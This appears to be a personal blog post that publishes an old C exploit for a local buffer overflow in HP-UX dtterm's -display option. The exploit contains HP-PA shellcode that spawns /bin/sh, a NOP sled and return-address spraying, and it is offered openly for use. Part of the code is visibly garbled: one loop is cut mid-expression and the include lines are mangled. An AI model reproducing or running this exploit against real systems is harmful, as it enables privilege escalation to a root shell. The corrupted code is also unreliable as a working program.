[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

cowhat

Well here comes an oldie but goodie, the dtterm -display option is a very old bug, my google foo did not really show me any exploits on it (I saw some bugs about setting the DISPLAY= variable and having it crash I’ll presume is the same bug, I don’t have an HP-UX at hand and found this in a very very VERY old directory while roaming around in old HDs and thought to publish it as again I can’t find any for HP-UX.

This bug is annoyingly easy, yet so hard, at first I wanted to setup just I setup the linux exploits (more on that later) by execve() and so forth but … guess not! anyway this was around the 2000 while I was honestly still fiddling with new techniques browsing around and never publishing my exploits, I have removed the old header as it was holding an old handle :P keep the mistic going! LoL!

Due to my noobness please change the “stdio.h”, “unistd.h” and “stdlib.h” for , and (google prettify is not kind on those so they wouldn’t “show” on the HTML but would be in the source such as embedding fail)

/*
  x-dtterm-hpux.c

  XXXXXXXX
  "This bug is completly theoderaadtical"
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"

#define BUFFSIZE  3000
#define ALIGN     0
#define NOP       0x08630243
#define OFFSET    0
#define FIRSTJUMP 40
#define RETADDR   0x7b00484c

static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

long get_sp(void) {
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
  char c0de[4096];
  char *ch_ptr;
  char *envy;
  int aux;
  unsigned long addr;
  unsigned long addr2;
  int align = ALIGN;
  int buffsize = BUFFSIZE;
  int offset = OFFSET;
  unsigned long sysaddr;

  if(argc > 1) align = atoi(argv[1]) * 4;
  if(argc > 2) offset = atoi(argv[2]);

  ch_ptr = c0de;

  addr=get_sp()+offset;
  addr2 = RETADDR + offset;
  addr2 = c0de;
  
  for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
    *(ch_ptr++)=(NOP>>24)&255;
    *(ch_ptr++)=(NOP>>16)&255;
    *(ch_ptr++)=(NOP>>8)&255;
    *(ch_ptr++)=NOP&255;
  }

  memcpy(ch_ptr, shellcode, strlen(shellcode));

  ch_ptr+=strlen(shellcode);
  
  for (aux=0; aux>24)&255;
    *(ch_ptr++)=(addr>>16)&255;   
    *(ch_ptr++)=(addr>>8)&255;
    *(ch_ptr++)=addr&255;
  }

  /*
  for (aux=0; aux<800; aux++) {
    *(ch_ptr++)=(addr2>>24)&255;
    *(ch_ptr++)=(addr2>>16)&255;   
    *(ch_ptr++)=(addr2>>8)&255;
    *(ch_ptr++)=addr2&255;
  }
  
  */
  c0de[BUFFSIZE-1]='\0';
  
  fprintf(stderr, "return address will be %#x shellcode is at %#x\n", addr, addr2);

  if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, NULL) < 0) {
    fprintf(stderr, "whoa!\n");
    exit(1);
  }
  
}

Hope you like it, I have HP-UX 11.11 compiled exploit binaries, either dynamic or static. But who in his right mind would just grab a binary from someone and run it? if I can get a hold of an HP-UX 11.11 machine with gcc/cc compiler I can video the compilation, get the md5 and then upload.

Anyway back to the SUNDAY SUNDAY SUNDAY!!!

If you like it, Share!

One Comment  to  [Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

  1. To tell the truth this became an incredible advanced article even so like all fantastic freelance writers there are some points that could be worked well about. However never ever the a smaller amount it had been interesting.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>